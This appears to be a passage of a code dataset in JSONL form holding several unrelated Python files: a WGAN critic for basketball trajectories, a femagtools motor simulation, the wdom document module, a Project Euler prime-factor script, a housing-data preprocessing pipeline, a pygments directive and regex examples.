self.__mismatched_cond = tf.random_shuffle(self.__matched_cond)\n # adversarial learning : wgan\n self.__build_model()\n\n # summary\n if self.if_training:\n self.__summary_op = tf.summary.merge(tf.get_collection('C'))\n self.__summary_histogram_op = tf.summary.merge(\n tf.get_collection('C_histogram'))\n self.__summary_valid_op = tf.summary.merge(\n tf.get_collection('C_valid'))\n self.summary_writer = tf.summary.FileWriter(\n self.log_dir + 'C')\n self.valid_summary_writer = tf.summary.FileWriter(\n self.log_dir + 'C_valid')\n else:\n self.baseline_summary_writer = tf.summary.FileWriter(\n self.log_dir + 'Baseline_C')\n\n def __build_model(self):\n self.real_scores = self.inference(\n self.__real_data, self.__matched_cond)\n self.fake_scores = self.inference(\n self.__G_samples, self.__matched_cond, reuse=True)\n if self.if_use_mismatched:\n mismatched_scores = self.inference(\n self.__real_data, self.__mismatched_cond, reuse=True)\n neg_scores = (self.fake_scores + mismatched_scores) / 2.0\n else:\n neg_scores = self.fake_scores\n\n if self.if_training:\n # loss function\n self.__loss = self.__loss_fn(\n self.__real_data, self.__G_samples, neg_scores, self.real_scores, self.penalty_lambda)\n theta = libs.get_var_list('C')\n with tf.name_scope('optimizer') as scope:\n # Critic train one iteration, step++\n assign_add_ = tf.assign_add(self.__steps, 1)\n with tf.control_dependencies([assign_add_]):\n optimizer = tf.train.AdamOptimizer(\n learning_rate=self.learning_rate, beta1=0.5, beta2=0.9)\n grads = tf.gradients(self.__loss, theta)\n grads = list(zip(grads, theta))\n self.__train_op = optimizer.apply_gradients(\n grads_and_vars=grads, global_step=self.__global_steps)\n # histogram logging\n for grad, var in grads:\n tf.summary.histogram(\n var.name + '_gradient', grad, collections=['C_histogram'])\n else:\n f_fake = tf.reduce_mean(self.fake_scores)\n f_real = tf.reduce_mean(self.real_scores)\n with tf.name_scope('C_loss') as scope:\n self.EM_dist = f_real - f_fake\n self.summary_em = tf.summary.scalar(\n 'Earth Moving Distance', self.EM_dist)\n\n def inference(self, inputs, conds, reuse=False):\n \"\"\"\n Inputs\n ------\n inputs : tensor, float, shape=[batch_size, seq_length=100, features=10]\n real(from data) or fake(from G)\n conds : tensor, float, shape=[batch_size, swq_length=100, features=13]\n conditions, ball and team A\n reuse : bool, optional, defalt value is False\n if share variable\n\n Return\n ------\n score : float\n real(from data) or fake(from G)\n \"\"\"\n with tf.variable_scope('C_inference', reuse=reuse):\n concat_ = tf.concat([conds, inputs], axis=-1)\n if self.if_handcraft_features:\n concat_ = self.data_factory.extract_features(concat_)\n with tf.variable_scope('conv_input') as scope:\n conv_input = tf.layers.conv1d(\n inputs=concat_,\n filters=self.n_filters,\n kernel_size=5,\n strides=1,\n padding='same',\n activation=libs.leaky_relu,\n kernel_initializer=layers.xavier_initializer(),\n bias_initializer=tf.zeros_initializer()\n )\n # residual block\n next_input = conv_input\n for i in range(self.n_resblock):\n res_block = libs.residual_block(\n 'Res' + str(i), next_input, n_filters=self.n_filters, n_layers=2, residual_alpha=self.residual_alpha, leaky_relu_alpha=self.leaky_relu_alpha)\n next_input = res_block\n with tf.variable_scope('conv_output') as scope:\n normed = layers.layer_norm(next_input)\n nonlinear = libs.leaky_relu(normed)\n conv_output = tf.layers.conv1d(\n inputs=nonlinear,\n filters=1,\n kernel_size=5,\n strides=1,\n padding='same',\n 
activation=libs.leaky_relu,\n kernel_initializer=layers.xavier_initializer(),\n bias_initializer=tf.zeros_initializer()\n )\n conv_output = tf.reduce_mean(conv_output, axis=1)\n final_ = tf.reshape(\n conv_output, shape=[-1])\n return final_\n\n def loss_for_G(self, reals, fakes, conds, latent_weight_penalty):\n \"\"\" \n Param\n -----\n reals : \n fakes : \n conds : \n latent_weight_penalty : \n \"\"\"\n openshot_penalty_lambda = tf.constant(\n self.openshot_penalty_lambda)\n openshot_penalty = self.__open_shot_penalty(\n reals, conds, fakes, if_log=True)\n fake_scores = self.inference(fakes, conds, reuse=True)\n scale_ = tf.abs(tf.reduce_mean(fake_scores))\n loss = - tf.reduce_mean(fake_scores) + scale_ * \\\n openshot_penalty_lambda * openshot_penalty + scale_ * latent_weight_penalty\n return loss\n\n def __open_shot_penalty(self, reals, conds, fakes, if_log):\n \"\"\"\n \"\"\"\n real_os_penalty = self.__open_shot_score(\n reals, conds, if_log=if_log, log_scope_name='real')\n fake_os_penalty = self.__open_shot_score(\n fakes, conds, if_log=if_log, log_scope_name='fake')\n return tf.abs(real_os_penalty - fake_os_penalty)\n\n def __open_shot_score(self, inputs, conds, if_log, log_scope_name=''):\n \"\"\"\n log_scope_name : string\n scope name for open_shot_score\n \"\"\"\n with tf.name_scope('open_shot_score') as scope:\n # calculate the open shot penalty on each frames\n ball_pos = tf.reshape(conds[:, :, :2], shape=[\n self.batch_size, self.seq_length, 1, 2])\n teamB_pos = tf.reshape(\n inputs, shape=[self.batch_size, self.seq_length, 5, 2])\n basket_right_x = tf.constant(self.data_factory.BASKET_RIGHT[0], dtype=tf.float32, shape=[\n self.batch_size, self.seq_length, 1, 1])\n basket_right_y = tf.constant(self.data_factory.BASKET_RIGHT[1], dtype=tf.float32, shape=[\n self.batch_size, self.seq_length, 1, 1])\n basket_pos = tf.concat(\n [basket_right_x, basket_right_y], axis=-1)\n # open shot penalty = amin((theta + 1.0) * (dist_ball_2_teamB + 1.0))\n vec_ball_2_teamB = ball_pos - teamB_pos\n vec_ball_2_basket = ball_pos - basket_pos\n b2teamB_dot_b2basket = tf.matmul(\n vec_ball_2_teamB, vec_ball_2_basket, transpose_b=True)\n b2teamB_dot_b2basket = tf.reshape(b2teamB_dot_b2basket, shape=[\n self.batch_size, self.seq_length, 5])\n dist_ball_2_teamB = tf.norm(\n vec_ball_2_teamB, ord='euclidean', axis=-1)\n dist_ball_2_basket = tf.norm(\n vec_ball_2_basket, ord='euclidean', axis=-1)\n\n theta = tf.acos(b2teamB_dot_b2basket /\n (dist_ball_2_teamB * dist_ball_2_basket+1e-3)) # avoid nan\n open_shot_score_all = (theta + 1.0) * (dist_ball_2_teamB + 1.0)\n\n # one_sub_cosine = 1 - b2teamB_dot_b2basket / \\\n # (dist_ball_2_teamB * dist_ball_2_basket)\n # open_shot_score_all = one_sub_cosine + dist_ball_2_teamB\n\n open_shot_score_min = tf.reduce_min(\n open_shot_score_all, axis=-1)\n open_shot_score = tf.reduce_mean(open_shot_score_min)\n if if_log:\n with tf.name_scope(log_scope_name):\n tf.summary.scalar('open_shot_score',\n open_shot_score, collections=['G'])\n return open_shot_score\n\n def __loss_fn(self, real_data, G_sample, fake_scores, real_scores, penalty_lambda):\n \"\"\" Critic loss\n\n Params\n ------\n real_data : tensor, float, shape=[batch_size, seq_length, features=10]\n real data, team B, defensive players\n G_sample : tensor, float, shape=[batch_size, seq_length, features=10]\n fake data, team B, defensive players\n fake_scores : tensor, float, shape=[batch_size]\n result from inference given fake data\n real_scores : tensor, float, shape=[batch_size]\n result from inference 
given real data\n penalty_lambda : float\n gradient penalty's weight, ref from paper 'improved-wgan'\n\n Return\n ------\n loss : float, shape=[]\n the mean loss of one batch\n \"\"\"\n with tf.name_scope('C_loss') as scope:\n # grad_pen, base on paper (Improved-WGAN)\n epsilon = tf.random_uniform(\n [self.batch_size, 1, 1], minval=0.0, maxval=1.0)\n X_inter = epsilon * real_data + (1.0 - epsilon) * G_sample\n if self.if_use_mismatched:\n cond_inter = epsilon * self.__matched_cond + \\\n (1.0 - epsilon) * self.__mismatched_cond\n else:\n cond_inter = self.__matched_cond\n\n grad = tf.gradients(\n self.inference(X_inter, cond_inter, reuse=True), [X_inter])[0]\n sum_ = tf.reduce_sum(tf.square(grad), axis=[1, 2])\n grad_norm = tf.sqrt(sum_)\n grad_pen = penalty_lambda * tf.reduce_mean(\n tf.square(grad_norm - 1.0))\n EM_dist = tf.identity(real_scores - fake_scores, name=\"EM_dist\")\n f_fake = tf.reduce_mean(fake_scores)\n f_real = tf.reduce_mean(real_scores)\n # Earth Moving Distance\n loss = f_fake - f_real + grad_pen\n\n # logging\n tf.summary.scalar('C_loss', loss,\n collections=['C', 'C_valid'])\n tf.summary.scalar('F_real', f_real, collections=['C'])\n tf.summary.scalar('F_fake', f_fake, collections=['C'])\n tf.summary.scalar('Earth Moving Distance',\n f_real - f_fake, collections=['C', 'C_valid'])\n tf.summary.scalar('grad_pen', grad_pen, collections=['C'])\n\n return loss\n\n def step(self, sess, G_samples, real_data, conditions):\n \"\"\" train one batch on C\n\n Params\n ------\n sess : tensorflow Session\n G_samples : float, shape=[batch_size, seq_length, features=10]\n fake data, team B, defensive players\n real_data : float, shape=[batch_size, seq_length, features=10]\n real data, team B, defensive players\n conditions : float, shape=[batch_size, seq_length, features=13]\n real data, team A, offensive players\n\n Returns\n -------\n loss : float\n batch mean loss\n global_steps : int\n global steps\n \"\"\"\n feed_dict = {self.__G_samples: G_samples,\n self.__matched_cond: conditions,\n self.__real_data: real_data}\n steps, summary, loss, global_steps, _ = sess.run(\n [self.__steps, self.__summary_op, self.__loss, self.__global_steps, self.__train_op], feed_dict=feed_dict)\n # log\n self.summary_writer.add_summary(\n summary, global_step=global_steps)\n if (steps - 1) % 1000 == 0:\n summary_histogram = sess.run(\n self.__summary_histogram_op, feed_dict=feed_dict)\n self.summary_writer.add_summary(\n summary_histogram, global_step=global_steps)\n\n return loss, global_steps\n\n def log_valid_loss(self, sess, G_samples, real_data, conditions):\n \"\"\" get one batch validation loss\n\n Params\n ------\n sess : tensorflow Session\n G_samples : float, shape=[batch_size, seq_length, features=10]\n fake data, team B, defensive players\n real_data : float, shape=[batch_size, seq_length, features=10]\n real data, team B, defensive players\n conditions : float, shape=[batch_size, seq_length, features=13]\n real data, team A, offensive players\n\n Returns\n -------\n loss : float\n validation batch mean loss\n \"\"\"\n feed_dict = {self.__G_samples: G_samples,\n self.__matched_cond: conditions,\n self.__real_data: real_data}\n summary, loss, global_steps = sess.run(\n [self.__summary_valid_op, self.__loss, self.__global_steps], feed_dict=feed_dict)\n # log\n self.valid_summary_writer.add_summary(\n summary, global_step=global_steps)\n return loss\n\n def eval_EM_distance(self, sess, G_samples, real_data, conditions, global_steps):\n \"\"\" \n \"\"\"\n feed_dict = {self.__G_samples: 
G_samples,\n self.__matched_cond: conditions,\n self.__real_data: real_data}\n _, summary = sess.run(\n [self.EM_dist, self.summary_em], feed_dict=feed_dict)\n self.baseline_summary_writer.add_summary(\n summary, global_step=global_steps)\n","sub_path":"src/RNN/Critic_Baseline.py","file_name":"Critic_Baseline.py","file_ext":"py","file_size_in_byte":16673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"418847567","text":"import femagtools\nimport femagtools.plot\nimport femagtools.machine\nimport logging\nimport matplotlib.pyplot as plt\nimport os\n\nlogging.basicConfig(level=logging.INFO,\n format='%(asctime)s %(message)s')\n\nmachine = dict(\n name=\"PM 270 L8\",\n lfe=0.08356,\n poles=8,\n outer_diam=0.26924,\n bore_diam=0.16192,\n inner_diam=0.092,\n airgap=0.00075,\n\n stator=dict(\n num_slots=48,\n nodedist=2.5,\n mcvkey_yoke='M330-50A',\n statorRotor3=dict(\n slot_height=0.0335,\n slot_h1=0.001,\n slot_h2=0.0,\n slot_r1=0.0001,\n slot_r2=0.00282,\n wedge_width1=0.00295,\n wedge_width2=0,\n middle_line=0,\n tooth_width=0.0,\n slot_top_sh=0.0,\n slot_width=0.00193)\n ),\n\n magnet=dict(\n mcvkey_yoke='M330-50A',\n magnetIronV=dict(\n magn_width=18e-3,\n magn_height=6.48e-3,\n magn_angle=145,\n magn_num=1,\n gap_ma_iron=0.2e-3,\n air_triangle=1e-3,\n iron_height=2.61e-3,\n iron_hs=0.1e-3,\n shaft_rad=55.32e-3,\n iron_shape=80.2e-3,\n air_space_h=5.5e-3,\n iron_bfe=3e-3,\n magn_di_ra=6e-3,\n corner_r=0,\n air_sp_ori=1,\n magn_ori=1,\n condshaft_r=55.32e-3)\n ),\n\n windings=dict(\n num_phases=3,\n num_wires=9,\n coil_span=6.0,\n num_layers=1)\n)\n\nlogging.basicConfig(level=logging.INFO,\n format='%(asctime)s %(message)s')\n\nworkdir = os.path.join(\n os.path.expanduser('~'), 'femag')\ntry:\n os.makedirs(workdir)\nexcept OSError:\n pass\n\nfemag = femagtools.Femag(workdir, magnetizingCurves='../magnetcurves')\n\npmRelSim = dict(\n angl_i_up=-39.3,\n calculationMode=\"pm_sym_fast\",\n wind_temp=60.0,\n magn_temp=60.0,\n current=76.43,\n period_frac=6,\n speed=50.0,\n shortCircuit=True,\n l_end_winding=0,\n l_external=0,\n sc_type=3,\n initial=2,\n allow_demagn=0,\n sim_demagn=1)\n\nr = femag(machine,\n pmRelSim)\n\nprint('Torque [Nm] = {}'.format(r.machine['torque']))\nprint('''\nShort Circuit Current Torque\n Peak iks {2:8.1f} A tks {3:8.1f} Nm\n Stationary ikd {0:8.1f} A tkd {1:8.1f} Nm\n\n peak winding currents {4}\n'''.format(r.scData['ikd'],\n r.scData['tkd'],\n r.scData['iks'],\n r.scData['tks'],\n r.scData['peakWindingCurrents']))\nprint('Demag {}'.format(r.demag[-1]))\n\nfig, ax = plt.subplots()\nfemagtools.plot.transientsc(r)\nplt.show()\n","sub_path":"examples/calculation/pm_sym_fast_shortcircuit.py","file_name":"pm_sym_fast_shortcircuit.py","file_ext":"py","file_size_in_byte":2625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"469206049","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport tempfile\nimport shutil\nfrom functools import partial\nfrom types import ModuleType\nfrom typing import Optional, Union, Callable\nimport weakref\n\nfrom wdom.options import config\nfrom wdom.interface import Event\nfrom wdom.node import Node, DocumentType, Text, RawHtml, Comment\nfrom wdom.node import DocumentFragment\nfrom wdom.element import Element, Attr, _create_element\nfrom wdom.web_node import WebElement\nfrom wdom.tag import HTMLElement\nfrom wdom.tag import Html, Head, Body, Meta, Link, Title, Script\nfrom wdom.window import Window\n\n\ndef 
getElementById(id: Union[str, int]) -> Optional[Node]:\n elm = Element._elements_with_id.get(str(id))\n if elm and elm.ownerDocument:\n return elm\n else:\n return None\n\n\ndef getElementByRimoId(id: Union[str, int]) -> Optional[WebElement]:\n elm = WebElement._elements_with_rimo_id.get(str(id))\n if elm and elm.ownerDocument:\n return elm\n else:\n return None\n\n\ndef _cleanup(path):\n if os.path.isdir(path):\n shutil.rmtree(path)\n\n\nclass Document(Node):\n nodeType = Node.DOCUMENT_NODE\n nodeName = '#document'\n\n @property\n def defaultView(self) -> Window:\n return self._window\n\n @property\n def tempdir(self) -> str:\n return self._tempdir\n\n def __init__(self, doctype='html', title='W-DOM', charset='utf-8',\n default_class=HTMLElement, autoreload=None, reload_wait=None):\n self._tempdir = _tempdir = tempfile.mkdtemp()\n self._finalizer = weakref.finalize(self, partial(_cleanup, _tempdir))\n super().__init__()\n self._window = Window(self)\n self._default_class = default_class\n self._autoreload = autoreload\n self._reload_wait = reload_wait\n\n self.doctype = DocumentType(doctype, parent=self)\n self.html = Html(parent=self)\n self.head = Head(parent=self.html)\n self.charset_element = Meta(parent=self.head)\n self.characterSet = charset\n self.title_element = Title(parent=self.head)\n self.title = title\n\n self.body = Body(parent=self.html)\n self.script = Script(parent=self.body)\n self._autoreload_script = Script(parent=self.head)\n\n def _set_autoreload(self):\n self._autoreload_script.textContent = ''\n if self._autoreload is None:\n autoreload = (config.autoreload or config.debug)\n else:\n autoreload = self._autoreload\n\n if autoreload:\n ar_script = []\n ar_script.append('var RIMO_AUTORELOAD = true')\n if self._reload_wait is not None:\n ar_script.append('var RIMO_RELOAD_WAIT = {}'.format(\n self._reload_wait))\n self._autoreload_script.textContent = '\\n{}\\n'.format(\n '\\n'.join(ar_script))\n\n def getElementById(self, id: Union[str, int]) -> Optional[Node]:\n elm = getElementById(id)\n if elm and elm.ownerDocument is self:\n return elm\n\n def getElementByRimoId(self, id: Union[str, int]) -> Optional[WebElement]:\n elm = getElementByRimoId(id)\n if elm and elm.ownerDocument is self:\n return elm\n\n def createElement(self, tag: str):\n return _create_element(tag, base=self._default_class)\n\n def createDocumentFragment(self):\n return DocumentFragment()\n\n def createTextNode(self, text: str):\n return Text(text)\n\n def createComment(self, text: str):\n return Comment(text)\n\n def createEvent(self, event: str):\n return Event(event)\n\n def createAttribute(self, name: str):\n return Attr(name)\n\n @property\n def title(self) -> str:\n return self.title_element.textContent\n\n @title.setter\n def title(self, value: str):\n self.title_element.textContent = value\n\n @property\n def characterSet(self) -> str:\n return self.charset_element.getAttribute('charset')\n\n @characterSet.setter\n def characterSet(self, value: str):\n self.charset_element.setAttribute('charset', value)\n\n @property\n def charset(self) -> str:\n return self.characterSet\n\n @charset.setter\n def charset(self, value: str):\n self.characterSet = value\n\n def add_jsfile(self, src: str):\n self.body.appendChild(Script(src=src))\n\n def add_jsfile_head(self, src: str):\n self.head.appendChild(Script(src=src))\n\n def add_cssfile(self, src: str):\n self.head.appendChild(Link(rel='stylesheet', href=src))\n\n def add_header(self, header: str):\n self.head.appendChild(RawHtml(header))\n\n def 
register_theme(self, theme: ModuleType) -> None:\n if not hasattr(theme, 'css_files'):\n raise ValueError('theme module must include `css_files`.')\n for css in getattr(theme, 'css_files', []):\n self.add_cssfile(css)\n for js in getattr(theme, 'js_files', []):\n self.add_jsfile(js)\n for header in getattr(theme, 'headers', []):\n self.add_header(header)\n for cls in getattr(theme, 'extended_classes', []):\n self.defaultView.customElements.define(cls)\n\n def build(self) -> str:\n self._set_autoreload()\n return ''.join(child.html for child in self.childNodes)\n\n\ndef get_new_document(include_rimo: bool = True,\n include_skeleton: bool = False,\n include_normalizecss: bool = False,\n autoreload: Optional[bool] = None,\n reload_wait: int = None,\n log_level: int = None,\n log_prefix: str = None,\n log_console: bool = False,\n ws_url: str = None,\n document_factory: Callable[..., Document] = Document,\n **kwargs) -> Document:\n document = document_factory(\n autoreload=autoreload,\n reload_wait=reload_wait,\n **kwargs)\n if log_level is None:\n log_level = config.logging\n\n log_script = []\n if log_level is not None:\n if isinstance(log_level, str):\n log_script.append('var RIMO_LOG_LEVEL = \\'{}\\''.format(log_level))\n elif isinstance(log_level, int):\n log_script.append('var RIMO_LOG_LEVEL = {}'.format(log_level))\n if log_prefix is not None:\n log_script.append('var RIMO_LOG_PREFIX = \\'{}\\''.format(log_prefix))\n if log_console:\n log_script.append('var RIMO_LOG_CONSOLE = true')\n if log_script:\n _s = Script(parent=document.head)\n _s.textContent = '\\n{}\\n'.format('\\n'.join(log_script))\n\n if ws_url is not None:\n _s = Script(parent=document.head)\n _s.textContent = '\\nvar RIMO_WS_URL = \\'{}\\'\\n'.format(ws_url)\n\n if include_rimo:\n document.add_jsfile_head('_static/js/rimo/rimo.js')\n\n return document\n\n\n# get_document = get_new_document\ndef get_document(*args, **kwargs):\n return rootDocument\n\n\ndef set_document(new_document: Document, *args, **kwargs):\n global rootDocument\n rootDocument = new_document\n\n\nrootDocument = get_new_document()\n","sub_path":"wdom/document.py","file_name":"document.py","file_ext":"py","file_size_in_byte":7107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"244169788","text":"import math\n\nPrimes = list();\nNumbers = [True]*1000000;\n\ndef genList():\n for i in range(2, 1000000):\n if(Numbers[i] == True):\n Primes.append(i);\n else:\n continue;\n \n for j in range(2*i, 1000000, i):\n Numbers[j] = False; #mark multiples of i as non prime\n\ndef Fcount(n):\n count = 0;\n \n for j in range(2, int(math.sqrt(n) + 1)):\n if(count >= 5):\n return count;\n if(n % j == 0):\n if(j in Primes):\n count += 1;\n if((n/j) in Primes):\n count += 1;\n return count;\n \n\ngenList(); \n\ni = 1000;\n\nwhile(1):\n if(Fcount(i) == 4):\n if(Fcount(i + 1) == 4):\n if(Fcount(i + 2) == 4):\n print(i, i + 1, i + 2, \"3 in a row\");\n if(Fcount(i + 3) == 4):\n print(i, \"4 in a row\");\n break;\n i += 1;\n\n \nprint(\"Done running\");\n\n\nPrimes = list()\n","sub_path":"047/Problem 47_Python.py","file_name":"Problem 47_Python.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"16923648","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport os\nimport hashlib\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import 
StratifiedShuffleSplit\n\nfrom sklearn.impute import SimpleImputer\n\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.preprocessing import LabelBinarizer\nfrom sklearn.preprocessing import StandardScaler\n\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.pipeline import FeatureUnion\n\nfrom pandas.plotting import scatter_matrix\n\nPATH = \"E:\\\\Data\\\\Hands-on-Machine-Learning\"\nNAME_FILE = \"housing.csv\"\n\ndef importation_donnees(chemin,nom_fichier):\n file_name = os.path.join(chemin,nom_fichier)\n data = pd.read_csv(file_name)\n return data\n\ndef categorie_income():\n housing[\"income_cat\"] = np.ceil(housing['median_income']/1.5)\n housing[\"income_cat\"].where(housing['income_cat']<5,5.0,inplace=True)\n\ndef split_stratifie():\n categorie_income()\n split= StratifiedShuffleSplit(n_splits=1,\n test_size=0.2,\n random_state=42)\n\n for train_index,test_index in split.split(housing,housing[\"income_cat\"]):\n strat_train = housing.loc[train_index]\n strat_test = housing.loc[test_index]\n \n #print(strat_train[\"income_cat\"].value_counts())\n #print(strat_train[\"income_cat\"].value_counts()/len(strat_train[\"income_cat\"]))\n\n return strat_train,strat_test\n\ndef first_step(): \n strat_train_set,strat_test_set = split_stratifie()\n \n for _set in (strat_train_set,strat_test_set):\n _set.drop(\"income_cat\",axis=1,inplace=True)\n\n return strat_train_set,strat_test_set\n\ndef export():\n housing = train.drop(\"median_house_value\",axis=1)\n labels= train[\"median_house_value\"]\n sauvegarde = os.path.join(PATH,'housing_labels.csv')\n\n labels.to_csv(sauvegarde, \n header=False, \n index=False, \n sep=',')\n\n housing_test = test.drop(\"median_house_value\",axis=1)\n\n labels_test = test[\"median_house_value\"]\n sauvegarde_test = os.path.join(PATH,'housing_labels_test.csv')\n\n labels_test.to_csv(sauvegarde_test, \n header=False, \n index=False, \n sep=',')\n\ndef encodage():\n housing = train.drop(\"median_house_value\",axis=1)\n labels= train[\"median_house_value\"]\n\n housing_num = housing.drop(\"ocean_proximity\",axis=1)\n\n imputer = SimpleImputer(strategy=\"median\")\n imputer.fit(housing_num)\n\n X = imputer.transform(housing_num)\n housing_tr = pd.DataFrame(X,columns=housing_num.columns)\n\n encoder = LabelEncoder()\n housing_cat = housing[\"ocean_proximity\"]\n housing_cat_encoded = encoder.fit_transform(housing_cat)\n\n encoder = OneHotEncoder()\n housing_cat_1hot = encoder.fit_transform(housing_cat_encoded.reshape(-1,1))\n\n encoder = LabelBinarizer()\n housing_cat_1hot = encoder.fit_transform(housing_cat)\n\n total_X = pd.concat([housing_tr,pd.DataFrame(housing_cat_1hot)])\n return total_X\n\nclass CombinedAttributesAdder(BaseEstimator, TransformerMixin):\n def __init__(self, add_bedrooms_per_room = True): # no *args or **kargs\n self.add_bedrooms_per_room = add_bedrooms_per_room\n \n def fit(self, X, y=None):\n return self # nothing else to do\n \n def transform(self, X, y=None):\n rooms_per_household = X[:, rooms_ix] / X[:, household_ix]\n population_per_household = X[:, population_ix] / X[:, household_ix]\n if self.add_bedrooms_per_room:\n bedrooms_per_room = X[:, bedrooms_ix] / X[:, rooms_ix]\n return np.c_[X, rooms_per_household, population_per_household,\n bedrooms_per_room]\n else:\n return np.c_[X, rooms_per_household, population_per_household]\n\nclass DataFrameSelector(BaseEstimator, TransformerMixin):\n def __init__(self, 
attribute_names):\n self.attribute_names = attribute_names\n def fit(self, X, y=None):\n return self\n def transform(self, X):\n return X[self.attribute_names].values\n\n###############################################################################\n########### DATASET ###########################################################\n###############################################################################\n\nrooms_ix, bedrooms_ix, population_ix, household_ix = 3, 4, 5, 6\nhousing = importation_donnees(PATH,NAME_FILE)\n\ntrain, test = first_step()\nexport()\n\nhousing = train.drop(\"median_house_value\",axis=1)\nlabels= train[\"median_house_value\"]\nhousing_num = housing.drop(\"ocean_proximity\",axis=1)\n\nhousing_test = test.drop(\"median_house_value\",axis=1)\nlabels= test[\"median_house_value\"]\nhousing_num_test = housing_test.drop(\"ocean_proximity\",axis=1)\n\n\n###############################################################################\n########### PIPELINE ##########################################################\n###############################################################################\n\nnum_attribs = list(housing_num.columns)\ncat_attribs = [\"ocean_proximity\"]\n\nnum_pipeline = Pipeline([\n ('selector', DataFrameSelector(num_attribs)),\n ('imputer', SimpleImputer(strategy=\"median\")),\n ('attribs_adder', CombinedAttributesAdder()),\n ('std_scaler', StandardScaler()),\n ])\n\ncat_pipeline = Pipeline([\n ('label_binarizer', LabelBinarizer()),\n ])\n\nfull_pipeline = FeatureUnion(transformer_list=[\n (\"num_pipeline\", num_pipeline),\n (\"cat_pipeline\", cat_pipeline),\n ])\n\n###############################################################################\n########### TRAIN #############################################################\n###############################################################################\n\nnumie = num_pipeline.fit_transform(housing)\n\nencoder = LabelBinarizer()\nhousing_cat = encoder.fit_transform(housing[\"ocean_proximity\"])\n\nprint(numie.shape)\nprint(housing_cat.shape)\n\nhousing_prepared = pd.concat([pd.DataFrame(numie),pd.DataFrame(housing_cat)],axis=1)\n\nprint(type(housing_prepared))\nprint(housing_prepared.shape)\n\nsauvegarde = os.path.join(PATH,'housing_prepared.csv')\n\nhousing_prepared.to_csv(sauvegarde, \n header=False, \n index=False, \n sep=',')\n\n###############################################################################\n########### TEST #############################################################\n###############################################################################\n\nnumie_test = num_pipeline.fit_transform(housing_test)\n\nencoder = LabelBinarizer()\nhousing_cat_test = encoder.fit_transform(housing_test[\"ocean_proximity\"])\n\nprint(numie_test.shape)\nprint(housing_cat_test.shape)\n\nhousing_prepared_test = pd.concat([pd.DataFrame(numie_test),pd.DataFrame(housing_cat_test)],axis=1)\n\nprint(type(housing_prepared_test))\nprint(housing_prepared_test.shape)\n\nsauvegarde_test = os.path.join(PATH,'housing_prepared_test.csv')\n\nhousing_prepared_test.to_csv(sauvegarde_test, \n header=False, \n index=False, \n sep=',')\n\n\n\n","sub_path":"Python - Hands On Machine Learning/05 - Hands On - Data Preparation.py","file_name":"05 - Hands On - Data Preparation.py","file_ext":"py","file_size_in_byte":7320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"520152940","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.4 (62061)\n# Decompiled from: Python 
3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.darwin-8.9.0-Power_Macintosh/egg/pudge/pygmentsupport.py\n# Compiled at: 2007-01-07 21:35:14\nimport docutils.parsers.rst\nfrom pygments import highlight\nfrom pygments.lexers import get_lexer_by_name, get_all_lexers\nfrom pygments.formatters import HtmlFormatter\n\ndef code_block(name, arguments, options, content, lineno, content_offset, block_text, state, state_machine):\n \"\"\"\n The code-block directive provides syntax highlighting for blocks\n of code. It is used with the the following syntax::\n\n .. code-block:: Python\n \n class Test(object):\n pass\n \n The code will be highlighted with the pygments syntax highlighter. It's\n recommended that you include the appropriate stylesheets when using this\n highlighter.\n \"\"\"\n try:\n language = arguments[0]\n except IndexError:\n language = options['language']\n\n language = language.lower()\n if language == 'hypertext':\n language = 'html'\n if language == 'pasteini':\n language = 'ini'\n lexer = get_lexer_by_name(language, stripall=True)\n formatter = HtmlFormatter(linenos=True, cssclass='syntax', encoding='utf-8')\n html = highlight(unicode(('\\n').join(content)), lexer, formatter).decode('utf-8')\n raw = docutils.nodes.raw('', html, format='html')\n return [raw]\n\n\ncode_block.arguments = (0, 1, 1)\ncode_block.options = {'language': docutils.parsers.rst.directives.unchanged}\ncode_block.content = 1\ndocutils.parsers.rst.directives.register_directive('code-block', code_block)","sub_path":"pycfiles/pudge-0.1.3-py2.4/pygmentsupport.py","file_name":"pygmentsupport.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"220830456","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport re\n\n# key = r\"
<html><body><h1>hello world</h1></body></html>"# this is the text you want to match\n# p1 = r"(?<=<h1>).+?(?=</h1>)"# this is our regex rule; you don't need to understand it yet\n# pattern1 = re.compile(p1)# compile the regular expression\n# matcher1 = re.search(pattern1,key)# search the source text for the part matching the regex\n# print(matcher1.group(0))# print it\n#\n# print('--------------------------------------------------------------------')\n#\n# key = r'asdfaljpythonasdfasdf asdf ;asdf'\n# p1 = r'python'\n# pattern1 = re.compile(p1)\n# matcher1 = re.search(pattern1,key)\n# print(666,matcher1.group(0))\n#\n# print('--------------------------------------------------------------------')\n#\n# key = r"<html><body><h1>hello world</h1></body></html>"# source text\n# p1 = r"<html>.+</html>"# the regex we wrote; we'll explain why below\n# pattern1 = re.compile(p1)\n# print(pattern1.findall(key))# notice it changed to findall? why?\n#\n# print('--------------------------------------------------------------------')\n#\n# key = r"afiouwehrfuichuxiuhong@hit.edu.cnaskdjhfiosueh"\n# p1 = r'chuxiuhong@hit\\.edu\\.cn'\n# pattern1 = re.compile(p1)\n# print(pattern1.findall(key))\n#\n# print('--------------------------------------------------------------------')\n#\n# key = r'http://www.abcdefg.com and https://1234567.com'\n# p1 = r'https*://'\n# pattern1 = re.compile(p1)\n# print(pattern1.findall(key))\n#\n# 